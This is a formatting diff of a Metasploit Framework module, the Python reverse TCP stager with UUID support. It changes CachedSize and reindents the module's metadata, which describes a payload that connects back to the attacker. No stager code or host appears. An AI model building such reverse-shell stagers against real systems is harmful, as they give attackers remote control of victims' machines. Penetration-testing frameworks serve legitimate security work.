@@ -3,10 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 module MetasploitModule
-
-  CachedSize = 601
+  CachedSize = :dynamic
 
   include Msf::Payload::Stager
   include Msf::Payload::Python
@@ -17,16 +15,19 @@ module MetasploitModule
   end
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name'        => 'Python Reverse TCP Stager with UUID Support',
-      'Description' => 'Connect back to the attacker with UUID Support',
-      'Author'      => 'OJ Reeves',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'python',
-      'Arch'        => ARCH_PYTHON,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Stager'      => {'Payload' => ""}
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'Python Reverse TCP Stager with UUID Support',
+        'Description' => 'Connect back to the attacker with UUID Support',
+        'Author' => 'OJ Reeves',
+        'License' => MSF_LICENSE,
+        'Platform' => 'python',
+        'Arch' => ARCH_PYTHON,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Stager' => { 'Payload' => '' }
+      )
+    )
   end
 
   # Tell the reverse_tcp payload to include the UUID
